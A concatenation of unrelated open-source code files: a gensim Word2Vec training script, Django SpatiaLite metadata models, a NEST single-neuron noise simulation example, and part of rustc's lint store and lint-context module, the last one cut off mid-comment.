for key in self.redis_obj.keys("*"):
count+=1
line = [self.context_prefix + str(key)]
line += [self.example_prefix + str(i) for i in ast.literal_eval(self.redis_obj.get(key))]
count+=1
if count%5000 == 0 :
print "Meta loaded: %s" %count
#print count
#print line
yield line
def train(model_file):
contexts = ContextCorpus(data_obj)
model = gensim.models.Word2Vec(contexts, min_count=5, workers= multiprocessing.cpu_count(), negative=3, sg=1, size = 300, sample=1e-3, hs=1, window = 5) #a1
#model = gensim.models.Word2Vec(contexts, min_count=5, workers=4, negative=3, sg=0, size = 300, sample=1e-5, hs=0, window = 5) #a2
#model = gensim.models.Word2Vec(contexts, min_count=5, workers=4, negative=5, sg=0, size = 300, sample=1e-3, hs=1, window = 5) #a3
#model = gensim.models.Word2Vec(contexts, min_count=5, workers=4, negative=10, sg=1, size = 300, sample=1e-3, hs=0, window = 5) #a4
#model = gensim.models.Word2Vec(contexts, min_count=5, workers=4, negative=10, sg=1, size = 300, sample=1e-5, hs=0, window = 5) #a5
#model = gensim.models.Word2Vec(contexts, min_count=5, workers=4, negative=3, sg=0, size = 300, sample=1e-4, hs=1, window = 5) #a6
# ./word2vec -train train100B.txt -read-vocab voc -output vectors.bin -cbow 1 -size 300 -window 5 -negative 3 -hs 0 -sample 1e-5 -threads 12 -binary 1 -min-count 10
model.init_sims(replace=True)
model.save(model_file)
if __name__ == "__main__":
logging.root.setLevel(level=logging.INFO)
logger.info("running %s", ' '.join(sys.argv))
model_file = 'data/models/user_local_context_v1_large.txt'
train(model_file)
logger.info("Saving model file %s in %s", model_file, os.path.abspath(model_file)) | unknown | codeparrot/codeparrot-clean | ||
"""
The GeometryColumns and SpatialRefSys models for the SpatiaLite backend.
"""
from django.db import models
from django.contrib.gis.db.backends.base import SpatialRefSysMixin
class GeometryColumns(models.Model):
"""
The 'geometry_columns' table from SpatiaLite.
"""
f_table_name = models.CharField(max_length=256)
f_geometry_column = models.CharField(max_length=256)
type = models.CharField(max_length=30)
coord_dimension = models.IntegerField()
srid = models.IntegerField(primary_key=True)
spatial_index_enabled = models.IntegerField()
class Meta:
db_table = 'geometry_columns'
managed = False
@classmethod
def table_name_col(cls):
"""
Returns the name of the metadata column used to store the
the feature table name.
"""
return 'f_table_name'
@classmethod
def geom_col_name(cls):
"""
Returns the name of the metadata column used to store the
the feature geometry column.
"""
return 'f_geometry_column'
def __unicode__(self):
return "%s.%s - %dD %s field (SRID: %d)" % \
(self.f_table_name, self.f_geometry_column,
self.coord_dimension, self.type, self.srid)
class SpatialRefSys(models.Model, SpatialRefSysMixin):
"""
The 'spatial_ref_sys' table from SpatiaLite.
"""
srid = models.IntegerField(primary_key=True)
auth_name = models.CharField(max_length=256)
auth_srid = models.IntegerField()
ref_sys_name = models.CharField(max_length=256)
proj4text = models.CharField(max_length=2048)
@property
def wkt(self):
from django.contrib.gis.gdal import SpatialReference
return SpatialReference(self.proj4text).wkt
class Meta:
db_table = 'spatial_ref_sys'
managed = False | unknown | codeparrot/codeparrot-clean | ||
# -*- coding: utf-8 -*-
#
# one_neuron_with_noise.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
"""
One neuron with noise
----------------------
This script simulates a neuron with input from the ``poisson_generator``, and
records the neuron's membrane potential.
"""
###############################################################################
# First, we import all necessary modules needed to simulate, analyze and
# plot our example. Additionally, we set the verbosity to only show warnings
# and reset the kernel.
# Resetting the kernel removes any nodes we may have created previously and
# resets the internal clock to zero. This allows us to execute the script
# several times in a Python shell without interference from previous NEST
# simulations.
import nest
import nest.voltage_trace
nest.set_verbosity("M_WARNING")
nest.ResetKernel()
###############################################################################
# Second, the nodes (the neuron, poisson generator (two of them), and the
# voltmeter) are created using the ``Create`` function.
# We store the returned handles in variables for later reference.
neuron = nest.Create("iaf_psc_alpha")
noise = nest.Create("poisson_generator", 2)
voltmeter = nest.Create("voltmeter")
###############################################################################
# Third, the Poisson generator is configured using ``SetStatus``, which expects
# a list of node handles and a list of parameter dictionaries. We set the
# Poisson generators to 8,000 Hz and 15,000 Hz, respectively. Note that we do
# not need to set parameters for the neuron and the voltmeter, since they have
# satisfactory defaults.
noise.set([{"rate": 80000.0}, {"rate": 15000.0}])
###############################################################################
# Fourth, the neuron is connected to the ``poisson_generator`` and to the
# ``voltmeter``. We also specify the synaptic weight and delay in this step.
nest.Connect(noise, neuron, syn_spec={'weight': [[1.2, -1.0]], 'delay': 1.0})
nest.Connect(voltmeter, neuron)
###############################################################################
# Now we simulate the network using ``Simulate``, which takes the
# desired simulation time in milliseconds.
nest.Simulate(1000.0)
###############################################################################
# Finally, we plot the neuron's membrane potential as a function of
# time.
nest.voltage_trace.from_device(voltmeter)
nest.voltage_trace.show() | unknown | codeparrot/codeparrot-clean | ||
//! Basic types for managing and implementing lints.
//!
//! See <https://rustc-dev-guide.rust-lang.org/diagnostics.html> for an
//! overview of how lints are implemented.
use std::cell::Cell;
use std::slice;
use rustc_ast::BindingMode;
use rustc_ast::util::parser::ExprPrecedence;
use rustc_data_structures::fx::FxIndexMap;
use rustc_data_structures::sync;
use rustc_data_structures::unord::UnordMap;
use rustc_errors::{Diag, LintBuffer, LintDiagnostic, MultiSpan};
use rustc_feature::Features;
use rustc_hir::def::Res;
use rustc_hir::def_id::{CrateNum, DefId};
use rustc_hir::definitions::{DefPathData, DisambiguatedDefPathData};
use rustc_hir::{Pat, PatKind};
use rustc_middle::bug;
use rustc_middle::lint::LevelAndSource;
use rustc_middle::middle::privacy::EffectiveVisibilities;
use rustc_middle::ty::layout::{LayoutError, LayoutOfHelpers, TyAndLayout};
use rustc_middle::ty::print::{PrintError, PrintTraitRefExt as _, Printer, with_no_trimmed_paths};
use rustc_middle::ty::{self, GenericArg, RegisteredTools, Ty, TyCtxt, TypingEnv, TypingMode};
use rustc_session::lint::{FutureIncompatibleInfo, Lint, LintExpectationId, LintId};
use rustc_session::{DynLintStore, Session};
use rustc_span::edit_distance::find_best_match_for_names;
use rustc_span::{Ident, Span, Symbol, sym};
use tracing::debug;
use {rustc_abi as abi, rustc_hir as hir};
use self::TargetLint::*;
use crate::levels::LintLevelsBuilder;
use crate::passes::{EarlyLintPassObject, LateLintPassObject};
type EarlyLintPassFactory = dyn Fn() -> EarlyLintPassObject + sync::DynSend + sync::DynSync;
type LateLintPassFactory =
dyn for<'tcx> Fn(TyCtxt<'tcx>) -> LateLintPassObject<'tcx> + sync::DynSend + sync::DynSync;
/// Information about the registered lints.
pub struct LintStore {
/// Registered lints.
lints: Vec<&'static Lint>,
/// Constructor functions for each variety of lint pass.
///
/// These should only be called once, but since we want to avoid locks or
/// interior mutability, we don't enforce this (and lints should, in theory,
/// be compatible with being constructed more than once, though not
/// necessarily in a sane manner. This is safe though.)
pub pre_expansion_passes: Vec<Box<EarlyLintPassFactory>>,
pub early_passes: Vec<Box<EarlyLintPassFactory>>,
pub late_passes: Vec<Box<LateLintPassFactory>>,
/// This is unique in that we construct them per-module, so not once.
pub late_module_passes: Vec<Box<LateLintPassFactory>>,
/// Lints indexed by name.
by_name: UnordMap<String, TargetLint>,
/// Map of registered lint groups to what lints they expand to.
lint_groups: FxIndexMap<&'static str, LintGroup>,
}
impl DynLintStore for LintStore {
fn lint_groups_iter(&self) -> Box<dyn Iterator<Item = rustc_session::LintGroup> + '_> {
Box::new(self.get_lint_groups().map(|(name, lints, is_externally_loaded)| {
rustc_session::LintGroup { name, lints, is_externally_loaded }
}))
}
}
/// The target of the `by_name` map, which accounts for renaming/deprecation.
#[derive(Debug)]
enum TargetLint {
/// A direct lint target
Id(LintId),
/// Temporary renaming, used for easing migration pain; see #16545
Renamed(String, LintId),
/// Lint with this name existed previously, but has been removed/deprecated.
/// The string argument is the reason for removal.
Removed(String),
/// A lint name that should give no warnings and have no effect.
///
/// This is used by rustc to avoid warning about old rustdoc lints before rustdoc registers
/// them as tool lints.
Ignored,
}
struct LintAlias {
name: &'static str,
/// Whether deprecation warnings should be suppressed for this alias.
silent: bool,
}
struct LintGroup {
lint_ids: Vec<LintId>,
is_externally_loaded: bool,
depr: Option<LintAlias>,
}
#[derive(Debug)]
pub enum CheckLintNameResult<'a> {
Ok(&'a [LintId]),
/// Lint doesn't exist. Potentially contains a suggestion for a correct lint name.
NoLint(Option<(Symbol, bool)>),
/// The lint refers to a tool that has not been registered.
NoTool,
/// The lint has been renamed to a new name.
Renamed(String),
/// The lint has been removed due to the given reason.
Removed(String),
/// The lint is from a tool. The `LintId` will be returned as if it were a
/// rustc lint. The `Option<String>` indicates if the lint has been
/// renamed.
Tool(&'a [LintId], Option<String>),
/// The lint is from a tool. Either the lint does not exist in the tool or
/// the code was not compiled with the tool and therefore the lint was
/// never added to the `LintStore`.
MissingTool,
}
impl LintStore {
pub fn new() -> LintStore {
LintStore {
lints: vec![],
pre_expansion_passes: vec![],
early_passes: vec![],
late_passes: vec![],
late_module_passes: vec![],
by_name: Default::default(),
lint_groups: Default::default(),
}
}
pub fn get_lints<'t>(&'t self) -> &'t [&'static Lint] {
&self.lints
}
pub fn get_lint_groups(&self) -> impl Iterator<Item = (&'static str, Vec<LintId>, bool)> {
self.lint_groups
.iter()
.filter(|(_, LintGroup { depr, .. })| {
// Don't display deprecated lint groups.
depr.is_none()
})
.map(|(k, LintGroup { lint_ids, is_externally_loaded, .. })| {
(*k, lint_ids.clone(), *is_externally_loaded)
})
}
pub fn register_early_pass(
&mut self,
pass: impl Fn() -> EarlyLintPassObject + 'static + sync::DynSend + sync::DynSync,
) {
self.early_passes.push(Box::new(pass));
}
/// This lint pass is softly deprecated. It misses expanded code and has caused a few
/// errors in the past. Currently, it is only used in Clippy. New implementations
/// should avoid using this interface, as it might be removed in the future.
///
/// * See [rust#69838](https://github.com/rust-lang/rust/pull/69838)
/// * See [rust-clippy#5518](https://github.com/rust-lang/rust-clippy/pull/5518)
pub fn register_pre_expansion_pass(
&mut self,
pass: impl Fn() -> EarlyLintPassObject + 'static + sync::DynSend + sync::DynSync,
) {
self.pre_expansion_passes.push(Box::new(pass));
}
pub fn register_late_pass(
&mut self,
pass: impl for<'tcx> Fn(TyCtxt<'tcx>) -> LateLintPassObject<'tcx>
+ 'static
+ sync::DynSend
+ sync::DynSync,
) {
self.late_passes.push(Box::new(pass));
}
pub fn register_late_mod_pass(
&mut self,
pass: impl for<'tcx> Fn(TyCtxt<'tcx>) -> LateLintPassObject<'tcx>
+ 'static
+ sync::DynSend
+ sync::DynSync,
) {
self.late_module_passes.push(Box::new(pass));
}
/// Helper method for register_early/late_pass
pub fn register_lints(&mut self, lints: &[&'static Lint]) {
for lint in lints {
self.lints.push(lint);
let id = LintId::of(lint);
if self.by_name.insert(lint.name_lower(), Id(id)).is_some() {
bug!("duplicate specification of lint {}", lint.name_lower())
}
if let Some(FutureIncompatibleInfo { reason, .. }) = lint.future_incompatible {
if let Some(edition) = reason.edition() {
self.lint_groups
.entry(edition.lint_name())
.or_insert(LintGroup {
lint_ids: vec![],
is_externally_loaded: lint.is_externally_loaded,
depr: None,
})
.lint_ids
.push(id);
} else {
// Lints belonging to the `future_incompatible` lint group are lints where a
// future version of rustc will cause existing code to stop compiling.
// Lints tied to an edition don't count because they are opt-in.
self.lint_groups
.entry("future_incompatible")
.or_insert(LintGroup {
lint_ids: vec![],
is_externally_loaded: lint.is_externally_loaded,
depr: None,
})
.lint_ids
.push(id);
}
}
}
}
fn insert_group(&mut self, name: &'static str, group: LintGroup) {
let previous = self.lint_groups.insert(name, group);
if previous.is_some() {
bug!("group {name:?} already exists");
}
}
pub fn register_group_alias(&mut self, group_name: &'static str, alias: &'static str) {
let Some(LintGroup { lint_ids, .. }) = self.lint_groups.get(group_name) else {
bug!("group alias {alias:?} points to unregistered group {group_name:?}")
};
self.insert_group(
alias,
LintGroup {
lint_ids: lint_ids.clone(),
is_externally_loaded: false,
depr: Some(LintAlias { name: group_name, silent: true }),
},
);
}
pub fn register_group(
&mut self,
is_externally_loaded: bool,
name: &'static str,
deprecated_name: Option<&'static str>,
to: Vec<LintId>,
) {
if let Some(deprecated) = deprecated_name {
self.insert_group(
deprecated,
LintGroup {
lint_ids: to.clone(),
is_externally_loaded,
depr: Some(LintAlias { name, silent: false }),
},
);
}
self.insert_group(name, LintGroup { lint_ids: to, is_externally_loaded, depr: None });
}
/// This lint should give no warning and have no effect.
///
/// This is used by rustc to avoid warning about old rustdoc lints before rustdoc registers them as tool lints.
#[track_caller]
pub fn register_ignored(&mut self, name: &str) {
if self.by_name.insert(name.to_string(), Ignored).is_some() {
bug!("duplicate specification of lint {}", name);
}
}
/// This lint has been renamed; warn about using the new name and apply the lint.
#[track_caller]
pub fn register_renamed(&mut self, old_name: &str, new_name: &str) {
let Some(&Id(target)) = self.by_name.get(new_name) else {
bug!("invalid lint renaming of {} to {}", old_name, new_name);
};
self.by_name.insert(old_name.to_string(), Renamed(new_name.to_string(), target));
}
pub fn register_removed(&mut self, name: &str, reason: &str) {
self.by_name.insert(name.into(), Removed(reason.into()));
}
pub fn find_lints(&self, lint_name: &str) -> Option<&[LintId]> {
match self.by_name.get(lint_name) {
Some(Id(lint_id)) => Some(slice::from_ref(lint_id)),
Some(Renamed(_, lint_id)) => Some(slice::from_ref(lint_id)),
Some(Removed(_)) => None,
Some(Ignored) => Some(&[]),
None => match self.lint_groups.get(lint_name) {
Some(LintGroup { lint_ids, .. }) => Some(lint_ids),
None => None,
},
}
}
/// True if this symbol represents a lint group name.
pub fn is_lint_group(&self, lint_name: Symbol) -> bool {
debug!(
"is_lint_group(lint_name={:?}, lint_groups={:?})",
lint_name,
self.lint_groups.keys().collect::<Vec<_>>()
);
let lint_name_str = lint_name.as_str();
self.lint_groups.contains_key(lint_name_str) || {
let warnings_name_str = crate::WARNINGS.name_lower();
lint_name_str == warnings_name_str
}
}
/// Checks the name of a lint for its existence, and whether it was
/// renamed or removed. Generates a `Diag` containing a
/// warning for renamed and removed lints. This is over both lint
/// names from attributes and those passed on the command line. Since
/// it emits non-fatal warnings and there are *two* lint passes that
/// inspect attributes, this is only run from the late pass to avoid
/// printing duplicate warnings.
///
/// Lookup order: if `tool_name` is given, the tool-qualified name
/// (`tool::lint`) is resolved first against registered lints, then lint
/// groups; only if the tool entry was `Renamed`/`Removed`/`Ignored` does
/// control fall through to the plain-name lookup below, which itself
/// falls back to a `clippy::` compatibility check for unknown names.
pub fn check_lint_name(
    &self,
    lint_name: &str,
    tool_name: Option<Symbol>,
    registered_tools: &RegisteredTools,
) -> CheckLintNameResult<'_> {
    if let Some(tool_name) = tool_name {
        // FIXME: rustc and rustdoc are considered tools for lints, but not for attributes.
        if tool_name != sym::rustc
            && tool_name != sym::rustdoc
            && !registered_tools.contains(&Ident::with_dummy_span(tool_name))
        {
            return CheckLintNameResult::NoTool;
        }
    }

    let complete_name = if let Some(tool_name) = tool_name {
        format!("{tool_name}::{lint_name}")
    } else {
        lint_name.to_string()
    };

    // If the lint was scoped with `tool::` check if the tool lint exists
    if let Some(tool_name) = tool_name {
        match self.by_name.get(&complete_name) {
            None => match self.lint_groups.get(&*complete_name) {
                // If the lint isn't registered, there are two possibilities:
                None => {
                    // 1. The tool is currently running, so this lint really doesn't exist.
                    // FIXME: should this handle tools that never register a lint, like rustfmt?
                    debug!("lints={:?}", self.by_name);
                    let tool_prefix = format!("{tool_name}::");

                    // Any `tool::` key in `by_name` proves the tool has run and
                    // registered lints, so the name is genuinely unknown.
                    return if self.by_name.keys().any(|lint| lint.starts_with(&tool_prefix)) {
                        self.no_lint_suggestion(&complete_name, tool_name.as_str())
                    } else {
                        // 2. The tool isn't currently running, so no lints will be registered.
                        // To avoid giving a false positive, ignore all unknown lints.
                        CheckLintNameResult::MissingTool
                    };
                }
                Some(LintGroup { lint_ids, depr, .. }) => {
                    // A deprecated (non-silent) group alias surfaces the new name.
                    return if let &Some(LintAlias { name, silent: false }) = depr {
                        CheckLintNameResult::Tool(lint_ids, Some(name.to_string()))
                    } else {
                        CheckLintNameResult::Tool(lint_ids, None)
                    };
                }
            },
            Some(Id(id)) => return CheckLintNameResult::Tool(slice::from_ref(id), None),
            // If the lint was registered as removed or renamed by the lint tool, we don't need
            // to treat tool_lints and rustc lints different and can use the code below.
            _ => {}
        }
    }
    match self.by_name.get(&complete_name) {
        Some(Renamed(new_name, _)) => CheckLintNameResult::Renamed(new_name.to_string()),
        Some(Removed(reason)) => CheckLintNameResult::Removed(reason.to_string()),
        None => match self.lint_groups.get(&*complete_name) {
            // If neither the lint, nor the lint group exists check if there is a `clippy::`
            // variant of this lint
            None => self.check_tool_name_for_backwards_compat(&complete_name, "clippy"),
            Some(LintGroup { lint_ids, depr, .. }) => {
                // Check if the lint group name is deprecated
                if let &Some(LintAlias { name, silent: false }) = depr {
                    CheckLintNameResult::Tool(lint_ids, Some(name.to_string()))
                } else {
                    CheckLintNameResult::Ok(lint_ids)
                }
            }
        },
        Some(Id(id)) => CheckLintNameResult::Ok(slice::from_ref(id)),
        Some(&Ignored) => CheckLintNameResult::Ok(&[]),
    }
}
/// Builds the `CheckLintNameResult::NoLint` answer for an unknown lint
/// name: first tries a simple lowercase respelling of `lint_name`, then
/// searches registered lint names and non-deprecated group names for the
/// closest textual match.
fn no_lint_suggestion(&self, lint_name: &str, tool_name: &str) -> CheckLintNameResult<'_> {
    let name_lower = lint_name.to_lowercase();

    if lint_name.chars().any(char::is_uppercase) && self.find_lints(&name_lower).is_some() {
        // First check if the lint name is (partly) in upper case instead of lower case...
        return CheckLintNameResult::NoLint(Some((Symbol::intern(&name_lower), false)));
    }

    // ...if not, search for lints with a similar name
    // Note: find_best_match_for_name depends on the sort order of its input vector.
    // To ensure deterministic output, sort elements of the lint_groups hash map.
    // Also, never suggest deprecated lint groups.
    // We will soon sort, so the initial order does not matter.
    #[allow(rustc::potential_query_instability)]
    let mut groups: Vec<_> = self
        .lint_groups
        .iter()
        .filter_map(|(k, LintGroup { depr, .. })| depr.is_none().then_some(k))
        .collect();
    groups.sort();
    let groups = groups.iter().map(|k| Symbol::intern(k));
    let lints = self.lints.iter().map(|l| Symbol::intern(&l.name_lower()));
    let names: Vec<Symbol> = groups.chain(lints).collect();
    // Look up both the full (possibly tool-qualified) name and its last
    // path segment, so `tool::lint` typos can still match bare names.
    let mut lookups = vec![Symbol::intern(&name_lower)];
    if let Some(stripped) = name_lower.split("::").last() {
        lookups.push(Symbol::intern(stripped));
    }
    let res = find_best_match_for_names(&names, &lookups, None);
    // A suggestion counts as "rustc" when the input was tool-qualified but
    // the best match does not belong to that tool.
    let is_rustc = res.map_or_else(
        || false,
        |s| name_lower.contains("::") && !s.as_str().starts_with(tool_name),
    );
    let suggestion = res.map(|s| (s, is_rustc));
    CheckLintNameResult::NoLint(suggestion)
}
/// Retries a failed plain-name lookup under `tool_name::lint_name`
/// (used for pre-tool-lint `clippy` names). Returns `Tool` with the
/// qualified name when the lint or group exists there, and a `NoLint`
/// suggestion otherwise.
fn check_tool_name_for_backwards_compat(
    &self,
    lint_name: &str,
    tool_name: &str,
) -> CheckLintNameResult<'_> {
    let complete_name = format!("{tool_name}::{lint_name}");

    if let Some(entry) = self.by_name.get(&complete_name) {
        return match entry {
            Id(id) => CheckLintNameResult::Tool(slice::from_ref(id), Some(complete_name)),
            other => {
                debug!("got renamed lint {:?}", other);
                CheckLintNameResult::NoLint(None)
            }
        };
    }

    match self.lint_groups.get(&*complete_name) {
        Some(LintGroup { lint_ids, .. }) => {
            CheckLintNameResult::Tool(lint_ids, Some(complete_name))
        }
        // Now we are sure, that this lint exists nowhere
        None => self.no_lint_suggestion(lint_name, tool_name),
    }
}
}
/// Context for lint checking outside of type inference.
pub struct LateContext<'tcx> {
    /// Type context we're checking in.
    pub tcx: TyCtxt<'tcx>,

    /// Current body, or `None` if outside a body.
    pub enclosing_body: Option<hir::BodyId>,

    /// Type-checking results for the current body. Access using the `typeck_results`
    /// and `maybe_typeck_results` methods, which handle querying the typeck results on demand.
    // FIXME(eddyb) move all the code accessing internal fields like this,
    // to this module, to avoid exposing it to lint logic.
    pub(super) cached_typeck_results: Cell<Option<&'tcx ty::TypeckResults<'tcx>>>,

    /// Parameter environment for the item we are in.
    pub param_env: ty::ParamEnv<'tcx>,

    /// Items accessible from the crate being checked.
    pub effective_visibilities: &'tcx EffectiveVisibilities,

    /// The `HirId` at which lints are looked up and reported (see the
    /// `LintContext` impl's `opt_span_lint`/`get_lint_level`).
    pub last_node_with_lint_attrs: hir::HirId,

    /// Generic type parameters in scope for the item we are in.
    pub generics: Option<&'tcx hir::Generics<'tcx>>,

    /// We are only looking at one module
    pub only_module: bool,
}
/// Context for lint checking of the AST, after expansion, before lowering to HIR.
pub struct EarlyContext<'a> {
    /// Tracks lint levels (top-down) and emits early lints.
    pub builder: LintLevelsBuilder<'a, crate::levels::TopDown>,
    /// Lints buffered during earlier phases, to be emitted by this context.
    pub buffered: LintBuffer,
}
/// Shared interface for emitting lints from both early (AST) and late
/// (HIR) lint contexts. Only `sess`, `opt_span_lint` and `get_lint_level`
/// are required; the remaining methods are convenience wrappers around
/// `opt_span_lint`.
pub trait LintContext {
    /// Gets the overall compiler `Session` object.
    fn sess(&self) -> &Session;

    // FIXME: These methods should not take an Into<MultiSpan> -- instead, callers should need to
    // set the span in their `decorate` function (preferably using set_span).
    /// Emit a lint at the appropriate level, with an optional associated span.
    ///
    /// [`lint_level`]: rustc_middle::lint::lint_level#decorate-signature
    #[track_caller]
    fn opt_span_lint<S: Into<MultiSpan>>(
        &self,
        lint: &'static Lint,
        span: Option<S>,
        decorate: impl for<'a, 'b> FnOnce(&'b mut Diag<'a, ()>),
    );

    /// Emit a lint at `span` from a lint struct (some type that implements `LintDiagnostic`,
    /// typically generated by `#[derive(LintDiagnostic)]`).
    fn emit_span_lint<S: Into<MultiSpan>>(
        &self,
        lint: &'static Lint,
        span: S,
        decorator: impl for<'a> LintDiagnostic<'a, ()>,
    ) {
        self.opt_span_lint(lint, Some(span), |lint| {
            decorator.decorate_lint(lint);
        });
    }

    /// Emit a lint at `span` from a lazily-constructed lint struct (some type that implements
    /// `LintDiagnostic`, typically generated by `#[derive(LintDiagnostic)]`).
    fn emit_span_lint_lazy<S: Into<MultiSpan>, L: for<'a> LintDiagnostic<'a, ()>>(
        &self,
        lint: &'static Lint,
        span: S,
        decorator: impl FnOnce() -> L,
    ) {
        self.opt_span_lint(lint, Some(span), |lint| {
            // Only build the decorator once the lint actually fires.
            let decorator = decorator();
            decorator.decorate_lint(lint);
        });
    }

    /// Emit a lint at the appropriate level, with an associated span.
    ///
    /// [`lint_level`]: rustc_middle::lint::lint_level#decorate-signature
    #[track_caller]
    fn span_lint<S: Into<MultiSpan>>(
        &self,
        lint: &'static Lint,
        span: S,
        decorate: impl for<'a, 'b> FnOnce(&'b mut Diag<'a, ()>),
    ) {
        self.opt_span_lint(lint, Some(span), decorate);
    }

    /// Emit a lint from a lint struct (some type that implements `LintDiagnostic`, typically
    /// generated by `#[derive(LintDiagnostic)]`).
    fn emit_lint(&self, lint: &'static Lint, decorator: impl for<'a> LintDiagnostic<'a, ()>) {
        // `None as Option<Span>` pins the span type parameter for the call.
        self.opt_span_lint(lint, None as Option<Span>, |lint| {
            decorator.decorate_lint(lint);
        });
    }

    /// Emit a lint at the appropriate level, with no associated span.
    ///
    /// [`lint_level`]: rustc_middle::lint::lint_level#decorate-signature
    fn lint(&self, lint: &'static Lint, decorate: impl for<'a, 'b> FnOnce(&'b mut Diag<'a, ()>)) {
        self.opt_span_lint(lint, None as Option<Span>, decorate);
    }

    /// This returns the lint level for the given lint at the current location.
    fn get_lint_level(&self, lint: &'static Lint) -> LevelAndSource;

    /// This function can be used to manually fulfill an expectation. This can
    /// be used for lints which contain several spans, and should be suppressed,
    /// if either location was marked with an expectation.
    ///
    /// Note that this function should only be called for [`LintExpectationId`]s
    /// retrieved from the current lint pass. Buffered or manually created ids can
    /// cause ICEs.
    fn fulfill_expectation(&self, expectation: LintExpectationId) {
        // We need to make sure that submitted expectation ids are correctly fulfilled suppressed
        // and stored between compilation sessions. To not manually do these steps, we simply create
        // a dummy diagnostic and emit it as usual, which will be suppressed and stored like a
        // normal expected lint diagnostic.
        self.sess()
            .dcx()
            .struct_expect(
                "this is a dummy diagnostic, to submit and store an expectation",
                expectation,
            )
            .emit();
    }
}
impl<'a> EarlyContext<'a> {
    /// Creates an `EarlyContext` from a fresh `LintLevelsBuilder` plus the
    /// lints buffered during earlier compilation phases.
    pub(crate) fn new(
        sess: &'a Session,
        features: &'a Features,
        lint_added_lints: bool,
        lint_store: &'a LintStore,
        registered_tools: &'a RegisteredTools,
        buffered: LintBuffer,
    ) -> EarlyContext<'a> {
        let builder =
            LintLevelsBuilder::new(sess, features, lint_added_lints, lint_store, registered_tools);
        EarlyContext { builder, buffered }
    }
}
impl<'tcx> LintContext for LateContext<'tcx> {
    /// Gets the overall compiler `Session` object.
    fn sess(&self) -> &Session {
        self.tcx.sess
    }

    /// Reports via the HIR node that most recently carried lint attributes,
    /// so the correct lint level applies.
    fn opt_span_lint<S: Into<MultiSpan>>(
        &self,
        lint: &'static Lint,
        span: Option<S>,
        decorate: impl for<'a, 'b> FnOnce(&'b mut Diag<'a, ()>),
    ) {
        let hir_id = self.last_node_with_lint_attrs;

        if let Some(span) = span {
            self.tcx.node_span_lint(lint, hir_id, span, decorate);
        } else {
            self.tcx.node_lint(lint, hir_id, decorate);
        }
    }

    fn get_lint_level(&self, lint: &'static Lint) -> LevelAndSource {
        self.tcx.lint_level_at_node(lint, self.last_node_with_lint_attrs)
    }
}
impl LintContext for EarlyContext<'_> {
    /// Gets the overall compiler `Session` object.
    fn sess(&self) -> &Session {
        self.builder.sess()
    }

    /// Delegates to the lint-levels builder, converting the span up front.
    fn opt_span_lint<S: Into<MultiSpan>>(
        &self,
        lint: &'static Lint,
        span: Option<S>,
        decorate: impl for<'a, 'b> FnOnce(&'b mut Diag<'a, ()>),
    ) {
        let span = span.map(|s| s.into());
        self.builder.opt_span_lint(lint, span, decorate)
    }

    fn get_lint_level(&self, lint: &'static Lint) -> LevelAndSource {
        self.builder.lint_level(lint)
    }
}
impl<'tcx> LateContext<'tcx> {
    /// The typing mode of the currently visited node. Use this when
    /// building a new `InferCtxt`.
    pub fn typing_mode(&self) -> TypingMode<'tcx> {
        // FIXME(#132279): In case we're in a body, we should use a typing
        // mode which reveals the opaque types defined by that body.
        TypingMode::non_body_analysis()
    }

    /// Bundles the current typing mode with this item's `ParamEnv`.
    pub fn typing_env(&self) -> TypingEnv<'tcx> {
        TypingEnv { typing_mode: self.typing_mode(), param_env: self.param_env }
    }

    /// Forwards to `TyCtxt::type_is_copy_modulo_regions` with this context's
    /// typing environment.
    pub fn type_is_copy_modulo_regions(&self, ty: Ty<'tcx>) -> bool {
        self.tcx.type_is_copy_modulo_regions(self.typing_env(), ty)
    }

    /// Forwards to `TyCtxt::type_is_use_cloned_modulo_regions` with this
    /// context's typing environment.
    pub fn type_is_use_cloned_modulo_regions(&self, ty: Ty<'tcx>) -> bool {
        self.tcx.type_is_use_cloned_modulo_regions(self.typing_env(), ty)
    }

    /// Gets the type-checking results for the current body,
    /// or `None` if outside a body.
    pub fn maybe_typeck_results(&self) -> Option<&'tcx ty::TypeckResults<'tcx>> {
        // Lazily query and cache typeck results for the enclosing body.
        self.cached_typeck_results.get().or_else(|| {
            self.enclosing_body.map(|body| {
                let typeck_results = self.tcx.typeck_body(body);
                self.cached_typeck_results.set(Some(typeck_results));
                typeck_results
            })
        })
    }

    /// Gets the type-checking results for the current body.
    /// As this will ICE if called outside bodies, only call when working with
    /// `Expr` or `Pat` nodes (they are guaranteed to be found only in bodies).
    #[track_caller]
    pub fn typeck_results(&self) -> &'tcx ty::TypeckResults<'tcx> {
        self.maybe_typeck_results().expect("`LateContext::typeck_results` called outside of body")
    }

    /// Returns the final resolution of a `QPath`, or `Res::Err` if unavailable.
    /// Unlike `.typeck_results().qpath_res(qpath, id)`, this can be used even outside
    /// bodies (e.g. for paths in `hir::Ty`), without any risk of ICE-ing.
    pub fn qpath_res(&self, qpath: &hir::QPath<'_>, id: hir::HirId) -> Res {
        match *qpath {
            hir::QPath::Resolved(_, path) => path.res,
            hir::QPath::TypeRelative(..) => self
                .maybe_typeck_results()
                // Only use cached results if they belong to `id`'s owner;
                // otherwise fall back to querying typeck for that owner.
                .filter(|typeck_results| typeck_results.hir_owner == id.owner)
                .or_else(|| {
                    self.tcx
                        .has_typeck_results(id.owner.def_id)
                        .then(|| self.tcx.typeck(id.owner.def_id))
                })
                .and_then(|typeck_results| typeck_results.type_dependent_def(id))
                .map_or(Res::Err, |(kind, def_id)| Res::Def(kind, def_id)),
        }
    }

    /// Gets the absolute path of `def_id` as a vector of `Symbol`.
    ///
    /// Note that this is kinda expensive because it has to
    /// travel the tree and pretty-print. Use sparingly.
    ///
    /// If you're trying to match for an item given by its path, use a
    /// diagnostic item. If you're only interested in given sections, use more
    /// specific functions, such as [`TyCtxt::crate_name`]
    ///
    /// FIXME: It would be great if this could be optimized.
    ///
    /// # Examples
    ///
    /// ```rust,ignore (no context or def id available)
    /// let def_path = cx.get_def_path(def_id);
    /// if let &[sym::core, sym::option, sym::Option] = &def_path[..] {
    ///     // The given `def_id` is that of an `Option` type
    /// }
    /// ```
